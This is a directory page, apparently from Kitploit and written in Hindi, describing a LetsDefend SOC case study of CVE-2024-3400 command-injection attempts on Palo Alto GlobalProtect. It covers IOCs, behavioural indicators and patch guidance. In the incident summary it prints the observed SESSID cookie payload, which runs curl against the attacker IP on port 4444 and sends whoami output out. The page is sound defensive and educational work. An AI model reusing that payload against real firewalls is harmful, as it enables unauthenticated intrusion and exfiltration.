Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
letsdefend-cve2024-3400-case-study — Palo Alto PAN-OS GlobalProtect पोर्टल्स को लक्षित करने वाले CVE-2024-3400 शोषण प्रयासों के लिए पहचान, विश्लेषण और प्रतिक्रिया रणनीतियाँ। इसमें IOCs, शोषण पैटर्न और शमन मार्गदर्शन शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/cyprianatsyor/letsdefend-cve2024-3400-case-study
समझौता संकेतक (IOC) प्रबंधनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफोरेंसिकडिजिटल फोरेंसिककमांड एंड कंट्रोलखतरा खुफियालर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
घटना प्रतिक्रिया
लॉग विश्लेषण
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

Palo Alto PAN-OS GlobalProtect पोर्टल्स को लक्षित करने वाले CVE-2024-3400 शोषण प्रयासों के लिए पहचान, विश्लेषण और प्रतिक्रिया रणनीतियाँ। इसमें IOCs, शोषण पैटर्न और शमन मार्गदर्शन शामिल हैं।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

letsdefend-cve2024-3400-case-study

CVE-2024-3400 शोषण प्रयासों की पहचान, विश्लेषण और प्रतिक्रिया रणनीतियाँ जो Palo Alto PAN-OS GlobalProtect पोर्टल्स को लक्षित करती हैं। IOCs, शोषण पैटर्न और शमन मार्गदर्शन शामिल हैं।

CVE-2024-3400 घटना जांच

🔍 अवलोकन

इस रिपॉजिटरी में CVE-2024-3400 की विस्तृत जांच और खतरा विश्लेषण शामिल है, जो Palo Alto Networks PAN-OS सॉफ़्टवेयर को प्रभावित करने वाली एक महत्वपूर्ण अप्रमाणित कमांड इंजेक्शन भेद्यता है, जो विशेष रूप से GlobalProtect पोर्टल को लक्षित करती है।

18 अप्रैल, 2024 को, कमजोर /global-protect/login.esp एंडपॉइंट का उपयोग करके एक आंतरिक PAN-OS फ़ायरवॉल के खिलाफ शोषण गतिविधि का पता चला। हमलावर ने एक निर्मित SESSID कुकी का उपयोग किया जिसमें एक बैकटिक-निष्पादित curl कमांड था, जो 144.172.79.92 (मियामी, फ्लोरिडा) पर होस्ट किए गए रिमोट C2 सर्वर तक पहुँचने के लिए था। शोषण पेलोड ने सरल फिल्टर को बायपास करने के लिए ${IFS} का लाभ उठाया और दुर्भावनापूर्ण गतिविधि को मंचित करने के लिए PAN-OS की टेलीमेट्री निर्देशिका का उपयोग किया। फ़ायरवॉल ने 200 OK के साथ प्रतिक्रिया दी, जो दर्शाता है कि पेलोड संभवतः सफलतापूर्वक निष्पादित हुआ।

Incident Overview

📄 घटना सारांश

  • ईवेंट आईडी: 249

  • पहचान नियम: SOC274 – PAN-OS कमांड इंजेक्शन शोषण

  • ईवेंट समय: 18 अप्रैल, 2024, 03:09 AM UTC

  • होस्टनाम: PA-Firewall-01

  • गंतव्य आईपी: 172.16.17.139

  • स्रोत आईपी: 144.172.79.92

  • अनुरोध विधि: POST

  • एंडपॉइंट: /global-protect/login.esp

  • कुकी पेलोड: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • दुर्भावनापूर्ण हैश:

  • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5: 0c1554888ce9ed0da1583dbdf7b31651

  • दुर्भावनापूर्ण स्क्रिप्ट: update.py ( का उपयोग करके निष्पादित)

🧠 खतरा खुफिया

Threat Intel

चरण 1: malpedia पर खोज करके प्रारंभिक शोषण का पता लगाना

Investigation Step 1

चरण 2: हैश का विश्लेषण और जांच

Investigation Step 2

चरण 3: एक और जांच

Investigation Step 3

चरण 4: आईपी पता जांच

Investigation Step 4

🧠 व्यवहारिक संकेतक

  • कमांड इंजेक्शन के लिए SESSID का दुरुपयोग
  • चोरी के लिए ${IFS} का उपयोग
  • /opt/panlogs/tmp/device_telemetry में पेलोड स्टेजिंग
  • शोषण के बाद dt_send प्रक्रिया की भागीदारी
  • पोर्ट 4444 पर हमलावर के आईपी पर नेटवर्क कॉलबैक

📄 लॉग साक्ष्य

Log Sample


🧩 हैश सहसंबंध

Hash Match


✅ अर्जित अंक LetsDefend

Key Points

🚨 प्रभाव

  • मुख्य सुरक्षा उपकरण पर दूरस्थ अप्रमाणित कमांड निष्पादन
  • हमलावर-नियंत्रित Python पेलोड का संभावित डाउनलोड और निष्पादन
  • स्टेजिंग या बहिर्गमन के लिए PAN-OS आंतरिक टेलीमेट्री तंत्र का दुरुपयोग
  • ज्ञात दुर्भावनापूर्ण आईपी से अनुमत ट्रैफ़िक

✅ अनुशंसित प्रतिक्रिया कार्रवाइयाँ

  1. PAN-OS को पैच करें संस्करणों में: 10.2.9-h1, 11.0.4-h1, या 11.1.2-h3
  2. दुर्भावनापूर्ण आईपी को ब्लॉक करें: 144.172.79.92
  3. समझौता संकेतक (IOCs) खोजें लॉग और फ़ाइल सिस्टम में
  4. टेलीमेट्री निर्देशिकाओं का निरीक्षण करें संदिग्ध फ़ाइलों या निष्पादन व्यवहार के लिए
  5. प्रभावित प्रणालियों को अलग करें और पूर्ण फोरेंसिक विश्लेषण करें

📁 सामग्री

  • logs/: पार्स किए गए और कच्चे पहचान लॉग
  • ioc/: हमले से जुड़े फ़ाइल हैश और आईपी
  • analysis/: शोषण व्यवहार और प्रक्रिया अनुरेखण में गहराई से जानकारी
  • report/: मेरी जांच के लॉग और कोड का सारांश और चित्र

CVE-2024-3400 क्या है

CVE-2024-3400 Palo Alto Networks PAN-OS में एक महत्वपूर्ण भेद्यता को संदर्भित करता है, जो विशेष रूप से GlobalProtect गेटवे को प्रभावित करता है। यहाँ इसके बारे में सार्वजनिक रूप से ज्ञात जानकारी का विवरण दिया गया है:

🔥 CVE-2024-3400 – Palo Alto PAN-OS कमांड इंजेक्शन भेद्यता

CVSS स्कोर: 10.0 (गंभीर)

प्रकाशित: अप्रैल 2024

प्रभावित उत्पाद: PAN-OS 10.2, 11.0, और 11.1 जब GlobalProtect सक्षम हो।

शोषण: वास्तविक दुनिया में पुष्टि (ज़ीरो-डे)

भेद्यता प्रकार: अप्रमाणित कमांड इंजेक्शन

🧠 जोखिम क्या है?

CVE-2024-3400 अप्रमाणित हमलावरों को फ़ायरवॉल के ऑपरेटिंग सिस्टम पर मनमाने कमांड निष्पादित करने की अनुमति देता है। यह अनिवार्य रूप से क्रेडेंशियल्स की आवश्यकता के बिना प्रभावित उपकरणों पर पूर्ण नियंत्रण देता है — Palo Alto फ़ायरवॉल पर निर्भर किसी भी उद्यम के लिए एक गंभीर उल्लंघन बिंदु।

⚠️ शोषण के लिए आवश्यक शर्तें:

  • GlobalProtect गेटवे सक्षम होना चाहिए।
  • विशिष्ट PAN-OS संस्करण (10.2.x, 11.0.x, 11.1.x)।
  • यदि अतिरिक्त सुरक्षा परतों के पीछे नहीं है तो इंटरनेट के माध्यम से शोषण योग्य।

🔎 हमलावर क्या कर रहे हैं:

  • इंजेक्शन दोष का शोषण करने के लिए निर्मित अनुरोध भेजना।
  • रिमोट शेल तैनात करना या दूसरे चरण के पेलोड डाउनलोड करना।
  • देखे गए व्यवहार में शामिल हैं:
    • निर्मित URLs के माध्यम से कमांड निष्पादन
    • स्थायित्व तंत्र
    • नेटवर्क के भीतर पार्श्व गति

🛡️ शमन और अनुशंसाएँ:

  • तुरंत पैच करें: Palo Alto ने फिक्स जारी किए; गैर-संवेदनशील संस्करणों में अपग्रेड करें (जैसे, 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 या बाद के)।
  • समझौता संकेतक (IOCs) की जाँच करें जैसे संदिग्ध प्रक्रियाएँ, आउटबाउंड कनेक्शन, या असामान्य CLI इतिहास।
  • संवेदनशील उपकरणों को खोजने के लिए Shodan या एसेट इन्वेंट्री जैसे उपकरणों का उपयोग करें।

🛠️ कैसे जांच करें (जैसे, LetsDefend या SIEM के माध्यम से):

  • बिना मान्य प्रमाणीकरण के GlobalProtect तक पहुँचने वाले बाहरी IPs की तलाश करें।
  • लॉग में संदिग्ध कमांड निष्पादन की जाँच करें (show system processes, cat /etc/passwd, आदि)।
  • फ़ायरवॉल व्यवहार की निगरानी करें और विषम आउटबाउंड कनेक्शन पर सचेत करें।

यह रिपॉजिटरी एक आंतरिक जांच रिपोर्ट और PAN-OS भेद्यताओं के वास्तविक दुनिया के शोषण को समझने के इच्छुक रक्षकों के लिए एक शैक्षिक संसाधन के रूप में कार्य करती है। योगदान और अतिरिक्त टिप्पणियों का स्वागत है।

टूल डाउनलोड करें
/usr/bin/python3